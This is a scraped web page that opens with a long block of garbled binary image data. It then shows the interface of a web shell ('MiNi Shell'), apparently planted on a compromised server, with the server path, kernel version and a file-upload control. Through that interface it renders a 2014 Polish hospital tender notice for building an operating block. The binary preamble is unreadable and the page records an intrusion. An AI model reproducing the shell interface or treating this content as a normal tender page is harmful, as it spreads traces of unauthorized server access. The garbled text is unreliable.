JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141001/325032-N-2014.html

<p class="kh_header"><b>Wrocław: Nr postępowania  64/14   - budowa bloku  operacyjnego II</b><br>
<b>Numer ogłoszenia: 325032 - 2014; data zamieszczenia: 01.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego , ul. Koszarowa 5, 51-149 Wrocław, woj. dolnośląskie, tel. 071 3261325 w. 128, faks 071 3260622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr postępowania  64/14   - budowa bloku  operacyjnego II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest wykonanie  obiektu budowlanego, polegające                             na  zaprojektowaniu i wybudowaniu  nowego  pawilonu   z przeznaczeniem  na BLOK OPERACYJNY  i  APTEKĘ  Szpitala w oparciu o program  funkcjonalno-użytkowy, stanowiący  załącznik  nr 1 do  SIWZ, zgodnie  z   wszystkimi  obowiązującymi  przepisami prawa związanymi  z budownictwem,  projektowaniem i przepisami  pokrewnymi,                    a    w szczególności:
1)	Prawo budowlane- ustawa z dnia 7 lipca 1994 r z późniejszymi zmianami,
2)	Rozporządzenie Ministra Infrastruktury z  12 kwietnia 2002 r z późniejszymi zmianami -  w sprawie warunków technicznych , jakim powinny odpowiadać budynki i ich usytuowanie,
3)	Rozporządzenie Ministra Zdrowia z dnia 22 czerwca 2005 r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia        i urządzenia zakładu opieki zdrowotnej,
4)	rozporządzenie  Ministra Infrastruktury    z dnia  2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych  oraz  programu funkcjonalno- użytkowego (Dz.U.04.202.2072 z późniejszymi zmianami),
5)	Ustawa z dnia 8 września 2006r. o Państwowym Ratownictwie Medycznym
6)	Rozporządzenie Ministra Infrastruktury z 3 lipca 2003 r. w sprawie szczegółowego zakresu        i formy projektu budowlanego,
7)	Rozporządzenie Ministra Kultury z dnia 9.06.2004 r w sprawie prowadzenia prac konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 poz. 1579 z 2004 r.),
8)	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 16 czerwca 2003r.w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. z dnia 11 lipca 2003 r.),
9)	Rozporządzenie Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy- jednolity tekst w obwieszczeniu Ministra Gospodarki i Polityki Socjalnej z dnia 28 sierpnia 2003 r. (Dz.U. nr 169 poz. 1650),
10)	  Ustawa o warunkach zdrowotnych żywności i żywienia z dnia 11 maja 2001 r. ( Dz.U. nr 63 poz. 634, z późn. zm.).
2.	Wykonawca  zobowiązany jest  do takiego     wykonywania   przedmiotu zamówienia na każdym etapie jego realizacji, który zagwarantuje   efekt w postaci   wybudowania  obiektu budowlanego   w     pełnej zgodności  z  przepisami prawa. 

3.	W ramach   realizacji  zamówienia  Wykonawca  zobowiązany jest  do:

1)	wykonania kompletnego projektu budowlanego na podstawie posiadanych  przez Zamawiającego koncepcji  i programu funkcjonalno-użytkowego - w branżach określonych w jej  punkcie 1.3    wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia   na budowę,
2)	Wykonanie na podstawie tych projektów kompletnych robót budowlanych, instalacyjnych                     i wykończeniowych z zachowaniem standardów jakościowych i rozwiązań ujętych                  w programie funkcjonalno-użytkowym,
3)	Zamawiający wymaga dostarczenia dokumentacji w wersji papierowej / w 4 egz., specyfikacji technicznych wykonania i odbioru robót budowlanych, informacji dotyczącej bezpieczeństwa  i ochrony zdrowia (BIOZ) - 3 szt./ oraz elektronicznej na płytach CD                w formie, uzgodnionej  z Zamawiającym (DWG, DOC, XML, ATH, ZUZ itp.). Dokumentacja projektowa musi być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
4)	Dostawy, montażu, zainstalowania,  uruchomienia  opisanych   w  załącznikach nr 2 - 8  do SIWZ, elementów wyposażenia, urządzeń, sprzętów i aparatury, a także rozmontowanie, przeniesienie i zainstalowanie wyposażenia stałego (stoły operacyjne,  kolumny anestezjologiczne, lampy) z istniejących sal operacyjnych do bloku operacyjnego budynku nowoprojektowanego,
5)	przygotowania harmonogramu prac i przedstawienia harmonogramu Zamawiającemu   do akceptacji. Obowiązujące przepisy (w tym w szczególności higieniczno-sanitarne, przeciwpożarowe oraz BHP i ergonomii), obowiązujące  normy, parametry istniejącego obiektu, itp.
6)	Wykonania przed rozpoczęciem prac projektowych, inwentaryzacji stanu istniejącego oraz   badania   geologicznego  gruntu,
7)	 Wykonawca zobowiązany jest  wystąpić  w imieniu Zamawiającego do właściwego   urzędu   o wydanie   decyzji zezwalającej na usunięcie  drzew w związku z realizacją  umowy, ich wycięcie  oraz  wykonanie  ewentualnych nasadzeń kompensacyjnych.    
8)	Sporządzenia  szczegółowego harmonogramu rzeczowo-finansowego /operatywnego/ inwestycji z podziałem na poszczególne obszary,
9)	 Ustanowienia  kierownika budowy  oraz koordynatora zespołu projektowego,
10)	 Przygotowania dokumentów związanych z oddaniem do użytkowania wykonanego zadania (dokumentacja powykonawcza) wraz z uzyskaniem w imieniu i na rzecz Zamawiającego pozwolenia   na użytkowanie  obiektu .
11)	 Realizacja   zamówienia nastąpi w dwóch etapach:  
a) I   Etap - opracowanie projektu budowlanego oraz  uzyskanie pozwolenia  na  budowę 
b) II  Etap - Wykonanie  prac  budowlanych wraz wyposażeniem 
12)	 Wykonawca zobowiązany jest  do zaprojektowania  oraz wybudowania  obiektu zgodnie                  z  obowiązującymi  w  tym zakresie  przepisami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 45.00.00.00-7, 45.21.51.00-8, 45.21.51.40-0, 45.21.51.41-8, 45.40.00.00-0, 45.30.00.00-0, 45.31.00.00-0, 45.32.00.00-0, 45.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 90000 zł ( dziewięćdziesiąt tysięcy  i 00/100   złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  posiadanej  wiedzy  i doświadczenia   i  wykazujący   się  	zrealizowaniem :
1)	 w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym  okresie,  minimum jednej  usługi   projektowej   o wartości  minimum  50.000,00 zł,           w  zakresie    zaprojektowania   min.  jednego bloku   operacyjnego  z  co najmniej dwiema  salami   operacyjnymi (w  budynkach    służby zdrowia, zgodnie                          z  rozporządzeniem -  XI kategoria   obiektów budowlanych)
2)	w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy,               w tym  okresie, robót budowlanych,  polegających  na wybudowaniu  2 bloków  operacyjnych  lub 1 bloku operacyjnego  i 1 oddziału  OITM wraz z w obiektach podmiotów leczniczych w rozumieniu  ustawy  o działalności leczniczej z dnia 15.04.2011 ( DZ.U. 2011 nr 112 poz.654 z późniejszymi zmianami, o wartości  min. 9.000.000 zł brutto), łącznie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.  w zakresie  dysponowania    odpowiednim  potencjałem   technicznym   oraz
         osobami   zdolnymi     do wykonania zamówienia

1) wykazując się dysponowaniem  osoby/ami     z uprawnieniami bez   ograniczeń            w  projektowaniu    o specjalności: architektonicznej, konstrukcyjno- budowlanej  posiadającymi uprawnienia do projektowania  
2) wykazując  się  dysponowaniem  kierownikiem budowy, który posiada wyższe wykształcenie techniczne, przynajmniej 5 letnie doświadczenie na stanowiskach kierowniczych oraz uprawnienia do kierowania budową i robotami oraz nadzorowania i kontrolowania robót        w specjalności  konstrukcyjno- budowlanej,  bez ograniczeń,  z doświadczeniem  w  wykonaniu   minimum jednej roboty budowlanej  polegającej na  wybudowaniu   bloku  operacyjnego,      
3) wykazując  się  dysponowaniem  kierownikami robot, którzy posiadają  uprawnienia budowlane bez ograniczeń w specjalnościach: konstrukcyjno- budowlanej, instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych oraz instalacyjnej w zakresie sieci instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych wentylacyjnych i klimatyzacyjnych  gazów  medycznych  z   uprawnieniami  do kierowania budową i robotami oraz nadzorowania i kontrolowania robót w określonych specjalnościach bez ograniczeń,  minimum 5 letnim  doświadczeniem zawodowym na budowach - jedna  osoba może   pełnić  więcej niż jedną  funkcję 

      Osoby, o których mowa powyżej  muszą legitymować się kwalifikacjami zawodowymi, doświadczeniem   i uprawnieniami, zgodnie z  przepisami  ustawy Prawo  Budowlane   z dnia   7 lipca 1994 lub odpowiadające im  uprawnienia  wydane na podstawie wcześniejszych   regulacji   oraz ustawy  z dnia15 grudnia 2000r.  o samorządach  zawodowych  architektów, inżynierów  budownictwa   oraz  urbanistów (DZ.U. Z 2001 Nr 5 poz. 42 ze zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla  oferowanego  przez Wykonawcę  sprzętu   i aparatury, wyposażenia    wykonawca  załączy:   
1)	Dokumenty rejestracyjne  dopuszczające  do stosowania    aparaturę, sprzęt   medyczny  do  obrotu 
2)	Inne dokumenty dopuszczające do  używania i stosowania sprzęt określony                              w  Załącznikach nr 2-8,  i/lub  dokumenty  określone w tych  załącznikach,
3)	Informacje producenta, strony  katalogowe, ulotki informacyjne  i/lub inne  dokumenty  z których wynikać będzie, że  oferowane  sprzęty, aparatura     spełnia  wymagania  Zamawiającego.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla  oferowanego  przez Wykonawcę  sprzętu   i aparatury, wyposażenia    wykonawca  załączy:   
1)	Dokumenty rejestracyjne  dopuszczające  do stosowania    aparaturę, sprzęt   medyczny  do  obrotu 
2)	Inne dokumenty dopuszczające do  używania i stosowania sprzęt określony                              w  Załącznikach nr 2-8,  i/lub  dokumenty  określone w tych  załącznikach,
3)	Informacje producenta, strony  katalogowe, ulotki informacyjne  i/lub inne  dokumenty  z których wynikać będzie, że  oferowane  sprzęty, aparatura     spełnia  wymagania  Zamawiającego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień  Publicznych   Zamawiający dopuszcza możliwość  zmiany  postanowień umowy  w stosunku  do treści   oferty, na następujących    warunkach:    

1) zamiana czasu trwania   umowy, w  szczególnie  uzasadnionych przypadkach,  w szczególności  konieczności   wykonania robót  dodatkowych , których  nie można   było przewidzieć w  chwili  zawarcia umowy       
2)  zmiana oznaczenia danych  Zamawiającego   i/lub Wykonawcy
3) Zmiana  Personelu  Wykonawcy  lub  Zamawiającego,
4) zmiana  w zakresie dostarczanego wyposażenia, w przypadku możliwości  zaoferowania   wyposażenia   o  parametrach   wyższych niż  wymagane  przez zamawiającego   lub technologii   wykonania robót budowlanych  bez    konieczności  ( możliwości )zmiany   ceny         
5) zmiany w przypadku regulacji prawnych  wprowadzonych  w życie  po dacie zawarcia  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital  Specjalistyczny  im. J. Gromkowskiego 
ul. Koszarowa 5 , 51-149 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2014 godzina 09:00, miejsce: Wojewódzki Szpital  Specjalistyczny  im. J. Gromkowskiego 
ul. Koszarowa 5 , 51-149 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com